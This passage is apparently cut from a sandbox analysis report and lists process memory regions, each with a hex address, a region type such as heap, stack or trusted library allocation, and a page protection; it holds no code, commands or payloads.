trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page execute and read and write
|
||
|
2F7B000
|
heap
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
2C9C000
|
heap
|
page read and write
|
||
|
5B82000
|
heap
|
page read and write
|
||
|
575000
|
heap
|
page read and write
|
||
|
2A00000
|
trusted library allocation
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
1B85B000
|
heap
|
page read and write
|
||
|
4871000
|
heap
|
page read and write
|
||
|
7FE8999D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
1DD0000
|
heap
|
page read and write
|
||
|
3CAE000
|
stack
|
page read and write
|
||
|
23AA000
|
trusted library allocation
|
page read and write
|
||
|
5B0C000
|
heap
|
page read and write
|
||
|
4828000
|
heap
|
page read and write
|
||
|
3A37000
|
heap
|
page read and write
|
||
|
7FE89978000
|
trusted library allocation
|
page read and write
|
||
|
482F000
|
heap
|
page read and write
|
||
|
5AAE000
|
heap
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
7FE89973000
|
trusted library allocation
|
page execute and read and write
|
||
|
324F000
|
stack
|
page read and write
|
||
|
7FE899FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
25AE000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4A63000
|
heap
|
page read and write
|
||
|
1E8000
|
heap
|
page read and write
|
||
|
1B27B000
|
stack
|
page read and write
|
||
|
486A000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
2BF9000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
1C1ED000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
325E000
|
trusted library allocation
|
page read and write
|
||
|
2ED000
|
heap
|
page read and write
|
||
|
7FE8997D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4801000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
3E4B000
|
stack
|
page read and write
|
||
|
3D45000
|
trusted library allocation
|
page read and write
|
||
|
3A83000
|
heap
|
page read and write
|
||
|
313D000
|
trusted library allocation
|
page read and write
|
||
|
22B1000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
2A0B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
1C458000
|
heap
|
page read and write
|
||
|
5B00000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
1AB06000
|
heap
|
page read and write
|
||
|
3272000
|
trusted library allocation
|
page read and write
|
||
|
2CD000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89B19000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B06000
|
trusted library allocation
|
page read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
313B000
|
trusted library allocation
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
4833000
|
heap
|
page read and write
|
||
|
3335000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
486D000
|
heap
|
page read and write
|
||
|
1B6E0000
|
heap
|
page read and write
|
||
|
1A2E0000
|
trusted library allocation
|
page read and write
|
||
|
25D3000
|
trusted library allocation
|
page read and write
|
||
|
441000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
4CE000
|
heap
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
292F000
|
stack
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
486A000
|
heap
|
page read and write
|
||
|
123DF000
|
trusted library allocation
|
page read and write
|
||
|
25C000
|
stack
|
page read and write
|
||
|
12BA2000
|
trusted library allocation
|
page read and write
|
||
|
1C4EF000
|
stack
|
page read and write
|
||
|
7FE89C14000
|
trusted library allocation
|
page read and write
|
||
|
3A01000
|
heap
|
page read and write
|
||
|
2C5E000
|
heap
|
page read and write
|
||
|
2BF3000
|
heap
|
page read and write
|
||
|
399C000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
1AD35000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
535000
|
heap
|
page read and write
|
||
|
482F000
|
heap
|
page read and write
|
||
|
4846000
|
heap
|
page read and write
|
||
|
3A60000
|
heap
|
page read and write
|
||
|
1F70000
|
heap
|
page execute and read and write
|
||
|
22B1000
|
trusted library allocation
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
3255000
|
trusted library allocation
|
page read and write
|
||
|
47E7000
|
heap
|
page read and write
|
||
|
35D000
|
heap
|
page read and write
|
||
|
2A06000
|
trusted library allocation
|
page read and write
|
||
|
485F000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
5B5000
|
heap
|
page read and write
|
||
|
326D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A16000
|
trusted library allocation
|
page read and write
|
||
|
224F000
|
stack
|
page read and write
|
||
|
37FD000
|
stack
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
588000
|
heap
|
page read and write
|
||
|
1B60000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
29E2000
|
trusted library allocation
|
page read and write
|
||
|
3322000
|
trusted library allocation
|
page read and write
|
||
|
7FE89972000
|
trusted library allocation
|
page read and write
|
||
|
1AD09000
|
heap
|
page read and write
|
||
|
3A7E000
|
heap
|
page read and write
|
||
|
394000
|
heap
|
page read and write
|
||
|
3AE0000
|
heap
|
page read and write
|
||
|
4815000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
4815000
|
heap
|
page read and write
|
||
|
3A0F000
|
heap
|
page read and write
|
||
|
29DD000
|
trusted library allocation
|
page read and write
|
||
|
23E000
|
heap
|
page read and write
|
||
|
430000
|
trusted library allocation
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
4863000
|
heap
|
page read and write
|
||
|
24E0000
|
heap
|
page read and write
|
||
|
1AFFF000
|
stack
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
2BFF000
|
heap
|
page read and write
|
||
|
2BFF000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
190000
|
trusted library allocation
|
page read and write
|
||
|
1DF0000
|
trusted library allocation
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
27E000
|
heap
|
page read and write
|
||
|
4889000
|
heap
|
page read and write
|
||
|
2E7000
|
heap
|
page read and write
|
||
|
3A86000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
1239D000
|
trusted library allocation
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
4831000
|
heap
|
page read and write
|
||
|
1AEB8000
|
stack
|
page read and write
|
||
|
7FE89AF7000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
3133000
|
trusted library allocation
|
page read and write
|
||
|
2C9C000
|
heap
|
page read and write
|
||
|
128DD000
|
trusted library allocation
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
1B3EE000
|
stack
|
page read and write
|
||
|
597B000
|
heap
|
page read and write
|
||
|
29D5000
|
trusted library allocation
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
13D000
|
stack
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
481A000
|
heap
|
page read and write
|
||
|
7FE89AE2000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B1C000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
3C8000
|
heap
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
3A6B000
|
heap
|
page read and write
|
||
|
4818000
|
heap
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
492C000
|
heap
|
page read and write
|
||
|
2CC000
|
stack
|
page read and write
|
||
|
7FE89943000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
59F1000
|
heap
|
page read and write
|
||
|
553000
|
heap
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
47F8000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
3A89000
|
heap
|
page read and write
|
||
|
1B216000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
1B1E0000
|
heap
|
page read and write
|
||
|
3267000
|
trusted library allocation
|
page read and write
|
||
|
4861000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
7FE89CBD000
|
trusted library allocation
|
page read and write
|
||
|
4826000
|
heap
|
page read and write
|
||
|
37F0000
|
trusted library allocation
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
29FF000
|
trusted library allocation
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
594C000
|
heap
|
page read and write
|
||
|
3A0F000
|
heap
|
page read and write
|
||
|
7FE89C35000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
123E1000
|
trusted library allocation
|
page read and write
|
||
|
4830000
|
heap
|
page read and write
|
||
|
42BF000
|
stack
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
5070000
|
heap
|
page read and write
|
||
|
7FE89BD1000
|
trusted library allocation
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
4A35000
|
heap
|
page read and write
|
||
|
29FE000
|
trusted library allocation
|
page read and write
|
||
|
1AD17000
|
heap
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
2CF000
|
stack
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
596F000
|
heap
|
page read and write
|
||
|
4831000
|
heap
|
page read and write
|
||
|
3DC000
|
heap
|
page read and write
|
||
|
484D000
|
heap
|
page read and write
|
||
|
3A7E000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2680000
|
trusted library allocation
|
page execute read
|
||
|
51F000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
368E000
|
stack
|
page read and write
|
||
|
230000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
1AADB000
|
heap
|
page read and write
|
||
|
2C27000
|
heap
|
page read and write
|
||
|
47F8000
|
heap
|
page read and write
|
||
|
337C000
|
stack
|
page read and write
|
||
|
223B000
|
heap
|
page read and write
|
||
|
3B72000
|
trusted library allocation
|
page read and write
|
||
|
1AB10000
|
heap
|
page read and write
|
||
|
2C93000
|
heap
|
page read and write
|
||
|
39C6000
|
heap
|
page read and write
|
||
|
4846000
|
heap
|
page read and write
|
||
|
4802000
|
heap
|
page read and write
|
||
|
29E2000
|
trusted library allocation
|
page read and write
|
||
|
4831000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
706000
|
heap
|
page read and write
|
||
|
326D000
|
trusted library allocation
|
page read and write
|
||
|
12551000
|
trusted library allocation
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
2BF3000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
7FE8999C000
|
trusted library allocation
|
page execute and read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
47F8000
|
heap
|
page read and write
|
||
|
4A1000
|
heap
|
page read and write
|
||
|
325B000
|
trusted library allocation
|
page read and write
|
||
|
326A000
|
trusted library allocation
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
2E2000
|
stack
|
page read and write
|
||
|
531000
|
heap
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
2B41000
|
trusted library allocation
|
page read and write
|
||
|
5B53000
|
heap
|
page read and write
|
||
|
1ED0000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
423E000
|
stack
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
29DB000
|
trusted library allocation
|
page read and write
|
||
|
412000
|
heap
|
page read and write
|
||
|
49E0000
|
heap
|
page read and write
|
||
|
326D000
|
trusted library allocation
|
page read and write
|
||
|
3BD000
|
heap
|
page read and write
|
||
|
4821000
|
heap
|
page read and write
|
||
|
4818000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
1B2CD000
|
stack
|
page read and write
|
||
|
3142000
|
trusted library allocation
|
page read and write
|
||
|
5B0000
|
direct allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
5CF000
|
direct allocation
|
page read and write
|
||
|
377000
|
direct allocation
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
1A76F000
|
stack
|
page read and write
|
||
|
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
|
1D80000
|
heap
|
page read and write
|
||
|
122B8000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1C455000
|
heap
|
page read and write
|
||
|
410000
|
trusted library allocation
|
page read and write
|
||
|
39D000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
325F000
|
trusted library allocation
|
page read and write
|
||
|
3A5E000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
1F7000
|
stack
|
page read and write
|
||
|
1A78E000
|
heap
|
page execute and read and write
|
||
|
1C0AB000
|
heap
|
page read and write
|
||
|
3A7E000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
332E000
|
trusted library allocation
|
page read and write
|
||
|
1B300000
|
heap
|
page execute and read and write
|
||
|
1F86000
|
heap
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page read and write
|
||
|
2722000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
2F45000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
3200000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
29F8000
|
trusted library allocation
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
2DF000
|
trusted library allocation
|
page read and write
|
||
|
2BE000
|
heap
|
page read and write
|
||
|
7FE89CA0000
|
trusted library allocation
|
page read and write
|
||
|
23D1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
18B000
|
stack
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
4DC0000
|
trusted library allocation
|
page read and write
|
||
|
2BF7000
|
heap
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
2CAD000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
391000
|
heap
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
332000
|
heap
|
page read and write
|
||
|
7FE89984000
|
trusted library allocation
|
page read and write
|
||
|
7FE89CBA000
|
trusted library allocation
|
page read and write
|
||
|
1A6AC000
|
stack
|
page read and write
|
||
|
7FE899F6000
|
trusted library allocation
|
page read and write
|
||
|
564000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
1B1D4000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
2810000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
59AA000
|
heap
|
page read and write
|
||
|
1B54000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
3139000
|
trusted library allocation
|
page read and write
|
||
|
584000
|
heap
|
page read and write
|
||
|
7FE89953000
|
trusted library allocation
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
direct allocation
|
page read and write
|
||
|
4A30000
|
heap
|
page read and write
|
||
|
7FE899CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
233A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
1B380000
|
trusted library section
|
page read and write
|
||
|
4CC0000
|
heap
|
page read and write
|
||
|
2A0E000
|
trusted library allocation
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
22D5000
|
trusted library allocation
|
page read and write
|
||
|
2CA3000
|
heap
|
page read and write
|
||
|
1AB6D000
|
heap
|
page read and write
|
||
|
29E4000
|
trusted library allocation
|
page read and write
|
||
|
3252000
|
trusted library allocation
|
page read and write
|
||
|
4863000
|
heap
|
page read and write
|
||
|
7FE89C80000
|
trusted library allocation
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
59E5000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
3262000
|
trusted library allocation
|
page read and write
|
||
|
326E000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
4864000
|
heap
|
page read and write
|
||
|
7FFFFF84000
|
trusted library allocation
|
page readonly
|
||
|
2ED000
|
heap
|
page read and write
|
||
|
26D0000
|
heap
|
page read and write
|
||
|
407000
|
heap
|
page read and write
|
||
|
7FE89B48000
|
trusted library allocation
|
page read and write
|
||
|
47D5000
|
heap
|
page read and write
|
||
|
3A5B000
|
heap
|
page read and write
|
||
|
1B324000
|
heap
|
page read and write
|
||
|
481E000
|
heap
|
page read and write
|
||
|
2BEB000
|
heap
|
page read and write
|
||
|
2C25000
|
heap
|
page read and write
|
||
|
3B4000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
4C5000
|
heap
|
page read and write
|
||
|
5B6A000
|
heap
|
page read and write
|
||
|
1AA85000
|
heap
|
page read and write
|
||
|
3A0F000
|
heap
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
482000
|
heap
|
page read and write
|
||
|
31F000
|
stack
|
page read and write
|
||
|
3A6D000
|
heap
|
page read and write
|
||
|
2CA1000
|
heap
|
page read and write
|
||
|
5AC5000
|
heap
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
59C2000
|
heap
|
page read and write
|
||
|
370000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
4AD000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
391E000
|
stack
|
page read and write
|
||
|
4863000
|
heap
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4BE000
|
heap
|
page read and write
|
||
|
4808000
|
heap
|
page read and write
|
||
|
588000
|
heap
|
page read and write
|
||
|
5A2C000
|
heap
|
page read and write
|
||
|
1AD68000
|
heap
|
page read and write
|
||
|
1C12F000
|
stack
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
38B000
|
direct allocation
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
122B1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
4865000
|
heap
|
page read and write
|
||
|
484A000
|
heap
|
page read and write
|
||
|
325A000
|
trusted library allocation
|
page read and write
|
||
|
1ACCF000
|
stack
|
page read and write
|
||
|
7FE8997D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4831000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
36C8000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
trusted library allocation
|
page read and write
|
||
|
7FE8996D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
12521000
|
trusted library allocation
|
page read and write
|
||
|
2C2C000
|
heap
|
page read and write
|
||
|
4861000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3A63000
|
heap
|
page read and write
|
||
|
3A37000
|
heap
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
33D000
|
heap
|
page read and write
|
||
|
3A7B000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
5A73000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
12798000
|
trusted library allocation
|
page read and write
|
||
|
4825000
|
heap
|
page read and write
|
||
|
1C4E9000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
325E000
|
trusted library allocation
|
page read and write
|
||
|
264E000
|
stack
|
page read and write
|
||
|
3A7E000
|
heap
|
page read and write
|
||
|
29D7000
|
trusted library allocation
|
page read and write
|
||
|
1F40000
|
direct allocation
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
469000
|
heap
|
page read and write
|
||
|
12BA2000
|
trusted library allocation
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
3A77000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B81000
|
trusted library allocation
|
page read and write
|
||
|
1C810000
|
heap
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
2A0D000
|
trusted library allocation
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
6D0000
|
direct allocation
|
page read and write
|
||
|
5957000
|
heap
|
page read and write
|
||
|
3A4E000
|
heap
|
page read and write
|
||
|
3260000
|
trusted library allocation
|
page read and write
|
||
|
1A869000
|
stack
|
page read and write
|
||
|
7FE89944000
|
trusted library allocation
|
page read and write
|
||
|
1C90000
|
trusted library allocation
|
page read and write
|
||
|
1A6AF000
|
stack
|
page read and write
|
||
|
7FE89A56000
|
trusted library allocation
|
page execute and read and write
|
||
|
5963000
|
heap
|
page read and write
|
||
|
1C58B000
|
stack
|
page read and write
|
||
|
3A63000
|
heap
|
page read and write
|
||
|
599E000
|
heap
|
page read and write
|
||
|
7FE89CC0000
|
trusted library allocation
|
page read and write
|
||
|
3EEB000
|
stack
|
page read and write
|
||
|
325A000
|
trusted library allocation
|
page read and write
|
||
|
2C98000
|
heap
|
page read and write
|
||
|
523000
|
heap
|
page read and write
|
||
|
7FE89A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C070000
|
heap
|
page read and write
|
||
|
1F60000
|
direct allocation
|
page read and write
|
||
|
1A6000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
49E1000
|
heap
|
page read and write
|
||
|
3B7D000
|
trusted library allocation
|
page read and write
|
||
|
376000
|
heap
|
page read and write
|
||
|
2FFC000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C220000
|
heap
|
page read and write
|
||
|
423000
|
heap
|
page read and write
|
||
|
1E00000
|
direct allocation
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
2D5000
|
heap
|
page read and write
|
||
|
3137000
|
trusted library allocation
|
page read and write
|
||
|
3B9E000
|
trusted library allocation
|
page read and write
|
||
|
4811000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
482A000
|
heap
|
page read and write
|
||
|
1AD06000
|
heap
|
page read and write
|
||
|
330000
|
direct allocation
|
page read and write
|
||
|
2C2C000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
56A000
|
heap
|
page read and write
|
||
|
45B000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
481E000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
3A16000
|
heap
|
page read and write
|
||
|
7FE89A2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89B24000
|
trusted library allocation
|
page read and write
|
||
|
226000
|
stack
|
page read and write
|
||
|
7FE899F6000
|
trusted library allocation
|
page read and write
|
||
|
59B6000
|
heap
|
page read and write
|
||
|
4A65000
|
heap
|
page read and write
|
||
|
39AA000
|
heap
|
page read and write
|
||
|
1CAFF000
|
stack
|
page read and write
|
||
|
39B0000
|
heap
|
page read and write
|
||
|
3D60000
|
heap
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
4818000
|
heap
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
37F5000
|
trusted library allocation
|
page read and write
|
||
|
47F8000
|
heap
|
page read and write
|
||
|
7FE89972000
|
trusted library allocation
|
page read and write
|
||
|
1C44E000
|
heap
|
page read and write
|
||
|
29E2000
|
trusted library allocation
|
page read and write
|
||
|
39AF000
|
heap
|
page read and write
|
||
|
3258000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
30AA000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B69000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF7000
|
trusted library allocation
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
245E000
|
stack
|
page read and write
|
||
|
1C1C0000
|
heap
|
page read and write
|
||
|
3450000
|
trusted library allocation
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
1A9CA000
|
stack
|
page read and write
|
||
|
3131000
|
trusted library allocation
|
page read and write
|
||
|
122BD000
|
trusted library allocation
|
page read and write
|
||
|
484D000
|
heap
|
page read and write
|
||
|
482A000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
3A6A000
|
heap
|
page read and write
|
||
|
334000
|
heap
|
page read and write
|
||
|
4C33000
|
heap
|
page read and write
|
||
|
387B000
|
trusted library allocation
|
page read and write
|
||
|
3A65000
|
heap
|
page read and write
|
||
|
3A14000
|
heap
|
page read and write
|
||
|
398000
|
stack
|
page read and write
|
||
|
1AB56000
|
heap
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
3329000
|
trusted library allocation
|
page read and write
|
||
|
5BA5000
|
heap
|
page read and write
|
||
|
1CB5F000
|
stack
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
7FE89CA9000
|
trusted library allocation
|
page read and write
|
||
|
5B24000
|
heap
|
page read and write
|
||
|
486E000
|
heap
|
page read and write
|
||
|
47E5000
|
heap
|
page read and write
|
||
|
1FC0000
|
heap
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
413F000
|
stack
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
3A37000
|
heap
|
page read and write
|
||
|
3990000
|
heap
|
